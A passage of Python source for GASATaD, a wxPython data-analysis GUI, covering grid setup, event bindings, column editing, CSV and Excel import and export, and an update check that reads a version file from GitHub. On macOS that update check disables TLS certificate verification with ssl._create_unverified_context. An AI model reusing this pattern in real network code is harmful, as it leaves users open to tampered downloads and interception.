# Grid
self.m_dataTable.CreateGrid(45, 45)
self.m_dataTable.EnableEditing(False)
self.m_dataTable.EnableGridLines(True)
self.m_dataTable.EnableDragGridSize(False)
self.m_dataTable.SetMargins(0, 0)
# Columns
self.m_dataTable.EnableDragColMove(False)
self.m_dataTable.EnableDragColSize(False)
self.m_dataTable.SetColLabelSize(30)
self.m_dataTable.SetColLabelAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)
# Rows
self.m_dataTable.EnableDragRowSize(False)
self.m_dataTable.SetRowLabelSize(80)
self.m_dataTable.SetRowLabelAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)
# Cell Defaults
self.m_dataTable.SetDefaultCellAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTER)
# Selection mode
self.m_dataTable.SetSelectionMode(wx.grid.Grid.wxGridSelectRows | wx.grid.Grid.wxGridSelectColumns)
# self.m_dataTable.EnableEditing(True)
fgSizer8 = wx.BoxSizer(wx.VERTICAL)
fgSizer8.Add(self.m_dataTable)
self.m_dataTable.Enable(False)
self.m_dataTable.Show(True)
globalSizer.Add(fgSizer8, flag=wx.ALL | wx.EXPAND, border=10)
# Options to show the GUI
self.SetSizer(globalSizer)
self.Layout()
self.Centre(wx.BOTH)
self.Show(True)
# self.Move((0,0))
widthScreen, heightScreen = wx.GetDisplaySize()
widthWindow = 1440
heightWindow = 900
if ((widthScreen >= widthWindow) and (heightScreen > heightWindow)):
self.SetSize((widthWindow, heightWindow))
else:
self.Maximize()
self.SetMinSize((1024, 768))
# Binding between buttons and functions which will control the events
self.Bind(wx.EVT_CLOSE, self.closeApp) # Close window
self.Bind(wx.EVT_MENU, self.openFile, self.m_menuNewFile)
self.Bind(wx.EVT_BUTTON, self.openFile, self.openNewFileBtn)
self.Bind(wx.EVT_MENU, self.addFile, self.m_menuAddFile)
self.Bind(wx.EVT_BUTTON, self.addFile, self.addFileBtn)
self.Bind(wx.EVT_MENU, self.saveFile, self.m_menuExportData)
self.Bind(wx.EVT_MENU, self.resetData, self.m_menuResetData)
self.Bind(wx.EVT_MENU, self.undo, self.m_undo)
self.Bind(wx.EVT_MENU, self.createNewColumn, self.m_addNewColumn)
self.Bind(wx.EVT_MENU, self.deleteColumnsByLabels, self.m_deleteColumns)
self.Bind(wx.EVT_MENU, self.deleteColumnsRows, self.m_deletedSelectedCR)
self.Bind(wx.EVT_MENU, self.renameCol, self.m_renameSelectedCol)
self.Bind(wx.EVT_MENU, self.moveCol, self.m_moveSelectedCol)
self.Bind(wx.EVT_MENU, self.replaceInCol, self.m_replaceInCol)
self.Bind(wx.EVT_MENU, self.discretizeCol, self.m_discretizeSelectedCol)
self.Bind(wx.EVT_MENU, self.numerizeCol, self.m_numerizeSelectedCol)
self.Bind(wx.EVT_MENU, self.sortAscendingCol, self.m_sortAscending)
self.Bind(wx.EVT_MENU, self.sortDescendingCol, self.m_sortDescending)
self.Bind(wx.EVT_MENU, self.appInformation, self.m_menuAbout)
self.Bind(wx.EVT_MENU, self.closeApp, self.m_menuQuit)
self.Bind(wx.EVT_BUTTON, self.createBasicStatisticsInterface, self.descriptiveStatsBtn)
self.Bind(wx.EVT_BUTTON, self.resetData, self.resetDataBtn)
self.Bind(wx.EVT_BUTTON, self.saveFile, self.exportDataBtn)
self.Bind(wx.EVT_BUTTON, self.createHistogram, self.histogramBtn)
self.Bind(wx.EVT_BUTTON, self.createScatterPlot, self.scatterPlotBtn)
self.Bind(wx.EVT_BUTTON, self.createPieChart, self.pieChartBtn)
self.Bind(wx.EVT_BUTTON, self.createBoxPlot, self.boxPlotBtn)
self.Bind(wx.EVT_BUTTON, self.createBarChart, self.barChartBtn)
self.Bind(wx.EVT_BUTTON, self.doSignificanceTest, self.significanceTestBtn)
self.Bind(wx.grid.EVT_GRID_CELL_RIGHT_CLICK, self.rightClickOnTable, self.m_dataTable)
self.Bind(wx.grid.EVT_GRID_LABEL_RIGHT_CLICK, self.rightClickOnTable, self.m_dataTable)
self.Bind(wx.grid.EVT_GRID_RANGE_SELECT, self.contentSelected, self.m_dataTable)
self.Bind(wx.grid.EVT_GRID_CELL_LEFT_DCLICK, self.cellModification, self.m_dataTable)
# A controller object is created
self.controller = Controller()
HelpString = (
" -help: shows this information\n"
" -loadCSV fileName: loads CSV file (full path is required)\n"
)
if (len(sys.argv) != 1 and (sys.platform == 'linux' or sys.platform == 'darwin')):
arguments = sys.argv[1:]
possibleArguments = ['-help', '-loadCSV']
for argument in arguments:
if argument[0] == '-':
if argument not in possibleArguments:
print("\n** ERROR: command '" + argument + "' not recognized **\n")
print("** GASATaD terminal mode commands:")
print(HelpString)
sys.exit(0)
if "-help" in arguments:
print("\n** GASATaD: terminal mode **\n")
print(HelpString)
sys.exit(0)
else:
if "-loadCSV" in arguments:
CSVFileName = arguments[arguments.index("-loadCSV") + 1]
print("Loading CSV file: " + CSVFileName)
self.OpenCSVFileNoGUI(CSVFileName)
def undo(self, event):
self.controller.recoverData()
if not self.m_dataTable.IsEnabled():
self.m_dataTable.Enable()
self.refreshGUI()
self.m_undo.SetText("Undo")
self.m_undo.Enable(False)
def cellModification(self, event):
dlg = wx.TextEntryDialog(self, "Type new value for cell (empty for 'null'):", 'Change cell', '')
if dlg.ShowModal() == wx.ID_OK:
newValue = dlg.GetValue()
dlg.Destroy()
if newValue == "":
newValue2 = numpy.NaN
else:
try:
newValue2 = numpy.float64(newValue)
except:
newValue2 = newValue
self.controller.storeData()
self.m_undo.SetText("Undo change cell")
self.m_undo.Enable()
self.controller.changeCellValue(event.GetRow(), event.GetCol(), newValue2)
self.controller.detectColumnTypes()
self.refreshGUI()
event.Skip()
else:
dlg.Destroy()
def contentSelected(self, event):
columnsSelected = self.m_dataTable.GetSelectedCols()
rowsSelected = self.m_dataTable.GetSelectedRows()
if len(rowsSelected) == 0 and len(columnsSelected) == 0:
self.m_deletedSelectedCR.Enable(False)
else:
self.m_deletedSelectedCR.Enable()
if len(rowsSelected) == 0 and len(columnsSelected) == 1:
self.m_renameSelectedCol.Enable()
self.m_moveSelectedCol.Enable()
self.m_editMenu.Enable(self.sortMenuID, True)
columnSelectedLabel = self.m_dataTable.GetColLabelValue(self.m_dataTable.GetSelectedCols()[0])
if columnSelectedLabel not in self.controller.characterValues:
self.m_discretizeSelectedCol.Enable()
if columnSelectedLabel in self.controller.characterValues:
self.m_numerizeSelectedCol.Enable()
self.m_replaceInCol.Enable()
else:
self.m_renameSelectedCol.Enable(False)
self.m_moveSelectedCol.Enable(False)
self.m_discretizeSelectedCol.Enable(False)
self.m_numerizeSelectedCol.Enable(False)
self.m_replaceInCol.Enable(False)
self.m_editMenu.Enable(self.sortMenuID, False)
event.Skip()
def deleteColumnsRows(self, event):
rowsSelected = self.m_dataTable.GetSelectedRows()
columnsSelected = self.m_dataTable.GetSelectedCols()
self.controller.storeData()
self.m_undo.SetText("Undo delete columns/rows")
self.m_undo.Enable()
columnsSelectedLabels = []
for columnIndex in columnsSelected:
columnsSelectedLabels.append(self.m_dataTable.GetColLabelValue(columnIndex))
self.controller.deleteColumns(columnsSelectedLabels)
if len(rowsSelected) > 0:
self.controller.deleteRows(rowsSelected)
if self.controller.programState.dataToAnalyse.empty:
self.controller.resetDataToAnalyse()
self.refreshGUI()
def rightClickOnTable(self, event):
columnClicked = event.GetCol()
columnsSelected = self.m_dataTable.GetSelectedCols()
if columnClicked in columnsSelected:
popupMenu = wx.Menu()
textPopupDelete = "Delete column"
if len(columnsSelected) > 1:
textPopupDelete += "s"
self.popupDeleteID = wx.NewId()
popupMenu.Append(self.popupDeleteID, textPopupDelete)
self.Bind(wx.EVT_MENU, self.deleteColumns, id=self.popupDeleteID)
if len(columnsSelected) == 1:
# Renaming menu entry
popupRenameID = wx.NewId()
popupMenu.Append(popupRenameID, "Rename column")
self.Bind(wx.EVT_MENU, self.renameCol, id=popupRenameID)
# Moving menu entry
popupMoveID = wx.NewId()
popupMenu.Append(popupMoveID, "Move column")
self.Bind(wx.EVT_MENU, self.moveCol, id=popupMoveID)
columnSelectedLabel = self.m_dataTable.GetColLabelValue(self.m_dataTable.GetSelectedCols()[0])
if columnSelectedLabel in self.controller.characterValues:
self.popupReplaceInColID = wx.NewId()
popupMenu.Append(self.popupReplaceInColID, "Replace in column")
self.Bind(wx.EVT_MENU, self.replaceInCol, id=self.popupReplaceInColID)
# Sort menu entry
popupSortSubMenuID = wx.NewId()
popupSortAscendingID = wx.NewId()
popupSortDescendingID = wx.NewId()
popupSubMenuSort = wx.Menu()
popupSubMenuSort.Append(popupSortAscendingID, "ascending")
popupSubMenuSort.Append(popupSortDescendingID, "descending")
popupMenu.Append(popupSortSubMenuID, "Sort using column", popupSubMenuSort)
self.Bind(wx.EVT_MENU, self.sortAscendingCol, id=popupSortAscendingID)
self.Bind(wx.EVT_MENU, self.sortDescendingCol, id=popupSortDescendingID)
# self.m_sortDescending = self.m_sortSubMenu.Append(wx.ID_ANY, "Descending")
# self.sortMenuID = wx.NewId()
# self.m_editMenu.AppendMenu(self.sortMenuID, "Sort using selected column",self.m_sortSubMenu )
# self.m_editMenu.Enable(self.sortMenuID,False)
# Discretizing menu entry
if columnSelectedLabel not in self.controller.characterValues:
self.popupDiscretizeID = wx.NewId()
popupMenu.Append(self.popupDiscretizeID, "Convert column to text")
self.Bind(wx.EVT_MENU, self.discretizeCol, id=self.popupDiscretizeID)
if columnSelectedLabel in self.controller.characterValues:
self.popupNumerizeID = wx.NewId()
popupMenu.Append(self.popupNumerizeID, "Convert column to numbers")
self.Bind(wx.EVT_MENU, self.numerizeCol, id=self.popupNumerizeID)
self.PopupMenu(popupMenu)
popupMenu.Destroy()
rowClicked = event.GetRow()
rowsSelected = self.m_dataTable.GetSelectedRows()
if rowClicked in rowsSelected:
textPopupDelete = "Delete row"
if len(rowsSelected) > 1:
textPopupDelete += "s"
popupMenu = wx.Menu()
self.popupDeleteID = wx.NewId()
popupMenu.Append(self.popupDeleteID, textPopupDelete)
self.Bind(wx.EVT_MENU, self.deleteRows, id=self.popupDeleteID)
self.PopupMenu(popupMenu)
popupMenu.Destroy()
event.Skip()
def deleteColumns(self, event): # Used after right-click on selected columns
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
columnsSelectedLabels = []
for columnIndex in columnsSelectedIndex:
columnsSelectedLabels.append(self.m_dataTable.GetColLabelValue(columnIndex))
self.controller.storeData()
self.m_undo.SetText("Undo delete columns")
self.m_undo.Enable()
self.controller.deleteColumns(columnsSelectedLabels)
if self.controller.programState.dataToAnalyse.empty:
self.controller.resetDataToAnalyse()
self.refreshGUI()
def moveCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
oldPos = columnsSelectedIndex[0]
maxPos = self.controller.getNumberOfColumns() - 1
newPosOk = False
while not newPosOk:
dlg = wx.TextEntryDialog(self, "New position for column (between 0 and " + str(maxPos) + "):",
"Move column", "")
if dlg.ShowModal() == wx.ID_OK:
newPos = dlg.GetValue()
dlg.Destroy()
try:
newPos = int(newPos)
newPosOk = True
except:
None
if newPosOk and (newPos < 0 or newPos > maxPos):
newPosOk = False
else:
dlg.Destroy()
break
if newPosOk:
self.controller.storeData()
self.m_undo.SetText("Undo move column")
self.m_undo.Enable()
colIndex = list(self.controller.getDataToAnalyse().columns)
label = colIndex[columnsSelectedIndex[0]]
colIndex.pop(columnsSelectedIndex[0])
colIndex.insert(newPos, label)
self.controller.reorderColumns(colIndex)
self.refreshGUI(updateDataInfo=False)
self.m_dataTable.SetGridCursor(0, newPos)
self.m_dataTable.MakeCellVisible(0, newPos)
self.m_dataTable.SelectCol(newPos)
def renameCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
oldLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
dlg = wx.TextEntryDialog(self, "Type new label for column '" + oldLabel + "':", 'Rename column', '')
if dlg.ShowModal() == wx.ID_OK:
newLabel = dlg.GetValue()
dlg.Destroy()
self.controller.storeData()
self.m_undo.SetText("Undo rename column")
self.m_undo.Enable()
self.controller.renameColumn(oldLabel, newLabel)
self.refreshGUI(updateDataInfo=False, markNans=False)
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
self.m_dataTable.SelectCol(columnsSelectedIndex[0])
else:
dlg.Destroy()
def replaceInCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
colLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
listTags = list(self.controller.programState.dataToAnalyse[str(colLabel)].unique())
if numpy.NaN in listTags:
listTags.remove(numpy.NaN)
listTags.insert(0, 'null')
selectValuesInterface = ReplaceInColInterface(self, listTags)
if selectValuesInterface.ShowModal() == wx.ID_OK:
self.controller.storeData()
self.m_undo.SetText("Undo replace")
self.m_undo.Enable()
oldTag, newTag = selectValuesInterface.getValues()
if oldTag == 'null':
oldTag = numpy.NaN
if newTag == "":
newTag = numpy.NaN
self.controller.replaceInTextCol(colLabel, oldTag, newTag)
self.refreshGUI()
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
self.m_dataTable.SelectCol(columnsSelectedIndex[0])
def discretizeCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
columnSelectedLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
self.controller.storeData()
self.m_undo.SetText("Undo convert to text")
self.m_undo.Enable()
self.controller.programState.dataToAnalyse[columnSelectedLabel] = self.controller.programState.dataToAnalyse[
columnSelectedLabel].astype(str)
self.controller.characterValues.append(columnSelectedLabel)
if columnSelectedLabel in self.controller.floatValues:
self.controller.floatValues.remove(columnSelectedLabel)
if columnSelectedLabel in self.controller.integerValues:
self.controller.integerValues.remove(columnSelectedLabel)
self.refreshGUI(updateDataInfo=False)
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
def numerizeCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
columnSelectedLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
self.controller.storeData()
self.m_undo.SetText("Undo convert to numbers")
self.m_undo.Enable()
oldType = self.controller.programState.dataToAnalyse[columnSelectedLabel].dtypes
self.controller.programState.dataToAnalyse[columnSelectedLabel] = to_numeric(
self.controller.programState.dataToAnalyse[columnSelectedLabel], errors='ignore')
newType = self.controller.programState.dataToAnalyse[columnSelectedLabel].dtypes
if oldType == newType:
dlg = wx.MessageDialog(None,
"The column '" + columnSelectedLabel + "' could not be converted to numerical values",
"Invalid conversion", wx.OK | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
else:
self.controller.characterValues.remove(columnSelectedLabel)
if newType == 'float64':
self.controller.floatValues.append(columnSelectedLabel)
else:
self.controller.integerValues.append(columnSelectedLabel)
self.refreshGUI(updateDataInfo=False)
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
def sortAscendingCol(self, event):
self.sortCol(True)
def sortDescendingCol(self, event):
self.sortCol(False)
def sortCol(self, ascendingBool):
self.controller.storeData()
self.m_undo.SetText("Undo sort rows")
self.m_undo.Enable()
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
columnSelectedLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
self.controller.programState.dataToAnalyse.sort_values(columnSelectedLabel, ascending=ascendingBool,
inplace=True)
self.refreshGUI(updateDataInfo=False)
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
self.m_dataTable.SelectCol(columnsSelectedIndex[0])
def deleteRows(self, event): # Used after right-click on selected rows
rowsSelectedIndex = self.m_dataTable.GetSelectedRows()
rowsSelectedLabels = []
for rowIndex in rowsSelectedIndex:
rowsSelectedLabels.append(self.m_dataTable.GetRowLabelValue(rowIndex))
self.controller.storeData()
self.m_undo.SetText("Undo delete rows")
self.m_undo.Enable()
self.controller.deleteRows(rowsSelectedIndex)
if self.controller.programState.dataToAnalyse.empty:
self.controller.resetDataToAnalyse()
self.refreshGUI()
def CheckUpdates(self):
from sys import argv
import urllib.request, urllib.error
import os
remoteVersion = ""
remoteVersionFile = ""
if (platform == "linux" or platform == "linux2") and argv[0] == "/usr/share/gasatad/GASATaD_2_0.py":
remoteVersionFile = "https://raw.githubusercontent.com/milegroup/gasatad/master/docs/programVersions/deb.txt"
elif (platform == "darwin") and ("GASATaD.app" in os.path.realpath(__file__)):
remoteVersionFile = "https://raw.githubusercontent.com/milegroup/gasatad/master/docs/programVersions/mac.txt"
elif platform == "win32" and argv[0].endswith(".exe"):
remoteVersionFile = "https://raw.githubusercontent.com/milegroup/gasatad/master/docs/programVersions/win.txt"
elif argv[0].endswith("GASATaD_2_0.py"):
# print "# Running GASATaD from source"
remoteVersionFile = "https://raw.githubusercontent.com/milegroup/gasatad/master/docs/programVersions/src.txt"
if remoteVersionFile:
try:
if platform != "darwin":
remoteFile = urllib.request.urlopen(remoteVersionFile)
remoteVersion = remoteFile.readline().strip()
remoteFile.close()
else:
import ssl
context = ssl._create_unverified_context()
remoteFile = urllib.request.urlopen(remoteVersionFile, context=context)
remoteVersion = remoteFile.readline().strip()
remoteFile.close()
# print "# Version available in GASATaD web page: ", remoteVersion
except urllib.error.URLError:
# print "# I couldn't check for updates"
None
if remoteVersion:
# print "# Version file exists"
if float(remoteVersion) > float(self.params['version']):
self.params['upgradable'] = True
self.params['availableVersionToUpgrade'] = remoteVersion
# self.params['upgradable'] = True
# self.params['availableVersionToUpgrade'] = remoteVersion
def openBrowserDownload(self, event):
import webbrowser
webbrowser.open("https://milegroup.github.io/gasatad/#download")
def updateDataInfo(self):
if self.controller.programState.dataToAnalyse.empty:
textInfo = u"Rows: 0 Columns: 0 Nulls: 0"
self.m_information.SetLabel(textInfo)
else:
numRows = self.controller.getNumberOfRows()
numCols = self.controller.getNumberOfColumns()
textInfo = "Rows: {0:d} Columns: {1:d} Nulls: {2:d}".format(numRows, numCols, self.params['noOfNulls'])
# textInfo += "\nText columns: {0:d}".format(len(self.controller.characterValues))
# textInfo += "\nInteger columns: {0:d}".format(len(self.controller.integerValues))
# textInfo += "\nFloat columns: {0:d}".format(len(self.controller.floatValues))
self.m_information.SetLabel(textInfo)
def OpenCSVFileNoGUI(self, fileName):
self.data = None
try:
self.Datafile = open(fileName, 'rU')
self.data = read_csv(self.Datafile, sep=None, engine='python', encoding='utf-8')
self.data.drop(self.data.columns[[0]], axis=1, inplace=True)
self.data.rename(columns={'Unnamed: 0': 'NoTag'}, inplace=True)
self.controller.OpenFile(self.data)
except UnicodeDecodeError:
print("Error: non ascii files in file")
return
except:
print("Error: ", sys.exc_info()[0])
print("There was some problem with the file")
return
self.refreshGUI()
print("File: " + fileName + " loaded")
def openFile(self, event):
askfile = AskFileType(self, -1, "open")
askfile.CenterOnScreen()
askfile.ShowModal()
askfile.Destroy()
def addFile(self, event):
askfile = AskFileType(self, -1, "add")
askfile.CenterOnScreen()
askfile.ShowModal()
askfile.Destroy()
def selectCSV(self, additionalFile):
openFileInterf = OpenCSVFile(self, -1, additionalFile=additionalFile, dirfrom=self.params['options']['dirfrom'])
def selectXLS(self, additionalFile):
openFileInterf = OpenXLSFile(self, -1, additionalFile=additionalFile, dirfrom=self.params['options']['dirfrom'])
def OpenAddCSV(self, openFileOptions):
# print "Gonna open CSV file"
# print openFileOptions
self.params['options']['dirfrom'] = openFileOptions['dirName']
readCorrect = True
self.data = None
discardCol = openFileOptions['discardFirstCol']
sepChar = ''
if openFileOptions['sepchar'] == "Comma":
sepChar = ','
elif openFileOptions['sepchar'] == "Semicolon":
sepChar = ';'
elif openFileOptions['sepchar'] == "Tab":
sepChar = '\t'
try:
self.data = read_csv(os.path.join(openFileOptions['dirName'], openFileOptions['fileName']), sep=sepChar,
header=0,
engine='python', encoding='utf-8')
except:
# print "Error: ", sys.exc_info()
type, value, traceback = sys.exc_info()
self.dlg = wx.MessageDialog(None, "Error reading file " + openFileOptions['fileName'] + "\n" + str(value),
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
readCorrect = False
if readCorrect:
if discardCol:
self.data.drop(self.data.columns[[0]], axis=1, inplace=True)
self.data.rename(columns={'Unnamed: 0': 'NoTag'}, inplace=True)
if openFileOptions['additionalFile'] and readCorrect and (
self.m_dataTable.GetNumberRows() != len(self.data.index)):
self.dlg = wx.MessageDialog(None,
"Number of rows does not match: \n Loaded data has " + str(
self.m_dataTable.GetNumberRows()) + " rows \n File " + openFileOptions[
'fileName'] + " has " + str(
len(self.data.index)) + " rows ", "File error",
wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
readCorrect = False
if readCorrect:
if openFileOptions['additionalFile']:
self.controller.storeData()
self.m_undo.SetText("Undo add file")
self.m_undo.Enable()
self.controller.OpenAdditionalFile(self.data)
else:
self.controller.OpenFile(self.data)
self.refreshGUI()
if self.controller.nullValuesInFile(self.data):
self.dlg = wx.MessageDialog(None, "File " + self.filename + " has one or more missing values",
"Missing values", wx.OK | wx.ICON_WARNING)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
if openFileOptions['additionalFile']:
# Move the view of the table to the last column
self.m_dataTable.SetGridCursor(0, self.controller.getNumberOfColumns() - 1)
self.m_dataTable.MakeCellVisible(0, self.controller.getNumberOfColumns() - 1)
def OpenAddXLS(self, openFileOptions):
# print "File to load: ", openFileOptions['fileName']
self.params['options']['dirfrom'] = openFileOptions['dirName']
readCorrect = True
self.data = None
rowColNames = openFileOptions['rowColNames']
noColsDiscard = openFileOptions['noColsDiscard']
sheetNumber = openFileOptions['sheetNumber']
# print "Reading col names from row: ", rowColNames
try:
self.data = read_excel(os.path.join(openFileOptions['dirName'], openFileOptions['fileName']),
sheet_name=sheetNumber, header=rowColNames,
index_col=None)
if noColsDiscard != 0:
self.data.drop(self.data.columns[range(noColsDiscard)], axis=1, inplace=True)
# self.data = self.preprocessExcel(self.data)
except:
# print "Error: ", sys.exc_info()
type, value, traceback = sys.exc_info()
self.dlg = wx.MessageDialog(None, "Error reading file " + openFileOptions['fileName'] + "\n" + str(value),
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
readCorrect = False
if readCorrect:
self.data.rename(columns={'Unnamed: 0': 'NoTag'}, inplace=True)
if openFileOptions['additionalFile'] and readCorrect and (
self.m_dataTable.GetNumberRows() != len(self.data.index)):
self.dlg = wx.MessageDialog(None,
"Number of rows does not match: \n Loaded data has " + str(
self.m_dataTable.GetNumberRows()) + " rows \n File " + openFileOptions[
'fileName'] + " has " + str(
len(self.data.index)) + " rows ", "File error",
wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
readCorrect = False
if readCorrect:
if openFileOptions['additionalFile']:
self.controller.storeData()
self.m_undo.SetText("Undo add file")
self.m_undo.Enable()
self.controller.OpenAdditionalFile(self.data)
else:
self.controller.OpenFile(self.data)
self.refreshGUI()
if self.controller.nullValuesInFile(self.data):
self.dlg = wx.MessageDialog(None,
"File " + openFileOptions['fileName'] + " has one or more missing values",
"Missing values", wx.OK | wx.ICON_WARNING)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
if openFileOptions['additionalFile']:
# Move the view of the table to the last column
self.m_dataTable.SetGridCursor(0, self.controller.getNumberOfColumns() - 1)
self.m_dataTable.MakeCellVisible(0, self.controller.getNumberOfColumns() - 1)
def preprocessExcel(self, data):
for row in range(len(data.index)):
for col in range(len(data.columns)):
if type(data.iloc[row, col]) == unicode or type(data.iloc[row, col]) == str:
if data.iloc[row, col].isspace():
data.iloc[row, col] = numpy.nan
if type(data.iloc[row, col]) == int:
data.iloc[row, col] = float(data.iloc[row, col])
data.dropna(axis=0, how='all', inplace=True)
for col in data.columns:
allNumbers = True;
for row in data.index:
if not isinstance(data.loc[row, col], (int, long, float)):
allNumbers = False;
if allNumbers:
data[col] = data[col].astype(numpy.float64)
return data
def adaptSizeOfGrid(self):
'''
This function calculates the number of rows and columns to adapt the grid
'''
numColsDataframe = self.controller.getNumberOfColumns()
numRowsDataframe = self.controller.getNumberOfRows()
numColsGrid = self.m_dataTable.GetNumberCols()
numRowsGrid = self.m_dataTable.GetNumberRows()
if numColsDataframe < numColsGrid:
self.m_dataTable.DeleteCols(0, (numColsGrid - numColsDataframe))
else:
self.m_dataTable.AppendCols((numColsDataframe - numColsGrid))
if numRowsDataframe < numRowsGrid:
self.m_dataTable.DeleteRows(0, (numRowsGrid - numRowsDataframe))
else:
self.m_dataTable.AppendRows((numRowsDataframe - numRowsGrid))
def fillInGrid(self):
colLabels = self.controller.getLabelsOfColumns()
numRows = self.controller.getNumberOfRows()
numCols = self.controller.getNumberOfColumns()
dataToAnalyse = self.controller.getDataToAnalyse()
self.adaptSizeOfGrid()
for i in range(len(colLabels)):
self.m_dataTable.SetColLabelValue(i, colLabels[i])
for row in range(numRows):
for col in range(numCols):
if dataToAnalyse.iloc[row, col] != dataToAnalyse.iloc[row, col]:
self.m_dataTable.SetCellValue(row, col, "nan")
elif type(dataToAnalyse.iloc[row, col]) == float:
dataToAnalyse.iloc[row, col] = numpy.float64(dataToAnalyse.iloc[row, col])
elif type(dataToAnalyse.iloc[row, col]) in (int, float, complex, numpy.float64, numpy.int64):
self.m_dataTable.SetCellValue(row, col, '{:5g}'.format(dataToAnalyse.iloc[row, col]))
else:
self.m_dataTable.SetCellValue(row, col, dataToAnalyse.iloc[row, col])
self.controller.detectColumnTypes()
def markNans(self):
# print "# Going to mark nans"
numRows = self.controller.getNumberOfRows()
numCols = self.controller.getNumberOfColumns()
self.params['noOfNulls'] = 0
for row in range(numRows):
for col in range(numCols):
content = self.m_dataTable.GetCellValue(row, col)
if content == 'nan' or content == 'null' or content.lower() == "no data": # This checks for nan
# print "# Nan detected in cell:",row," ",col
self.m_dataTable.SetCellValue(row, col, "null")
# self.m_dataTable.SetCellBackgroundColour(row,col,'peachpuff')
self.m_dataTable.SetCellBackgroundColour(row, col, wx.Colour(255, 218, 185))
self.params['noOfNulls'] += 1
else:
if self.m_dataTable.GetColLabelValue(col) in self.controller.characterValues:
self.m_dataTable.SetCellBackgroundColour(row, col, wx.Colour(250, 250, 210))
elif self.m_dataTable.GetColLabelValue(col) in self.controller.integerValues:
self.m_dataTable.SetCellBackgroundColour(row, col, wx.Colour(240, 255, 255))
else:
self.m_dataTable.SetCellBackgroundColour(row, col, 'white')
def saveFile(self, event):
askfile = AskFileType(self, -1, "save")
askfile.CenterOnScreen()
askfile.ShowModal()
askfile.Destroy()
def saveToCSV(self):
self.fileExtensions = "CSV files (*.csv)|*.csv;*.CSV|All files (*.*)|*.*"
saveFile = wx.FileDialog(self, message='Save file', defaultDir=self.params['options']['dirfrom'],
defaultFile='untitled.csv', wildcard=self.fileExtensions,
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if saveFile.ShowModal() == wx.ID_OK:
self.filename = saveFile.GetFilename()
self.directory = saveFile.GetDirectory()
fileExtension = self.filename.rpartition(".")[-1]
if fileExtension.lower() != "csv":
self.dlg = wx.MessageDialog(None,
"Error exporting file " + self.filename + "\nFile extension (.csv) is required",
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
else:
path = os.path.join(self.directory, self.filename)
exportCsv = ExportCsvOptions(self)
if exportCsv.ShowModal() == wx.ID_OK:
try:
self.controller.exportDataCSV(path, exportCsv.getSelectedExportOptions())
except:
self.dlg = wx.MessageDialog(None, "Error saving to file " + self.filename,
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
return
dlg = wx.MessageDialog(None, "Data saved to file: " + self.filename, "File operation",
wx.OK | wx.ICON_INFORMATION)
self.params['options']['dirfrom'] = self.directory
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
def saveToXLS(self):
self.fileExtensions = "Excel files (*.xls;*.xlsx)|*.xls;*.xlsx;*.XLS;*.XLSX|All files (*.*)|*.*"
saveFile = wx.FileDialog(self, message='Save file', defaultDir=self.params['options']['dirfrom'],
defaultFile='untitled.xlsx',
wildcard=self.fileExtensions, style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if saveFile.ShowModal() == wx.ID_OK:
self.filename = saveFile.GetFilename()
self.directory = saveFile.GetDirectory()
fileExtension = self.filename.rpartition(".")[-1]
if fileExtension.lower() not in ["xls", "xlsx"]:
self.dlg = wx.MessageDialog(None,
"Error exporting file " + self.filename + "\nFile extension (.xls|.xlsx) is required",
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
else:
path = os.path.join(self.directory, self.filename)
try:
self.controller.exportDataExcel(path)
except:
self.dlg = wx.MessageDialog(None, "Error saving to file " + self.filename,
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
return
dlg = wx.MessageDialog(None, "Data saved to file: " + self.filename, "File operation",
wx.OK | wx.ICON_INFORMATION)
self.params['options']['dirfrom'] = self.directory
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
def resetData(self, event):
self.controller.storeData()
self.m_undo.SetText("Undo close data")
